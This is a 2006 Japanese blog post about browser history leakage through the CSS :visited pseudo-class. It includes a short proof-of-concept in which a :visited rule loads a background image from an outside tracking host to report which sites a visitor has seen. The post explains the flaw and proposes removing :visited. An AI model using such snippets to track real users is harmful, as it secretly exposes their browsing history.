August 2006
July September
13th Sun

訪問済みサイト情報が漏洩する問題

This article was migrated from http://rails.office.drecom.jp/takiuchi/archive/83

brazilさんのエントリ「そのリソースを訪問済みか判定する」で、visited擬似クラスによって訪問済みサイトの情報が漏洩してしまうという事が指摘されています。

確かにいろいろまずそうですね…。addRuleを使わなくても、background-imageとかで外部URLを指定して、そこへのアクセスを調べたら、動的にvisitedのルールを追加できなくても同じ事が出来そうです。 

<style>
a#url-1:visited {
  background-image: url("http://accesscheck.com/?url=http://foo.bar.com/");
}
</style>
<a id="url-1" href="http://foo.bar.com/">foo.bar.com</a>
visited擬似クラス自体を無くす必要があるかも。

This article was migrated from http://rails.office.drecom.jp/takiuchi/archive/83

posted by Png genki on Sun 13 Aug 2006 at 00:57
Contents
訪問済みサイト情報が漏洩する問題
Comments
瀧内元気: MacOS版は以下にあります * [genki/ViMouse](https://githu... '23-1
dsjf: https://gist.github.com/6bf1bf2c3cbb5eb6e7a7 これ... '13-1
瀧内元気: おお、チェックしてみます。thx! '11-12
overisland: Reeder for iPhone もこの UI を実装していますね。 '11-12
瀧内元気: その情報は見たのですが、以下のサイトによると、現在はまた必要になってるっぽいんですよね。 ... '11-12
Services from s21g
twpro(ツイプロ)
Twitterプロフィールを快適検索
地価2009
土地の値段を調べてみよう
MyRestaurant
自分だけのレストラン手帳
Formula
ブログに数式を埋め込める数式コミュニティ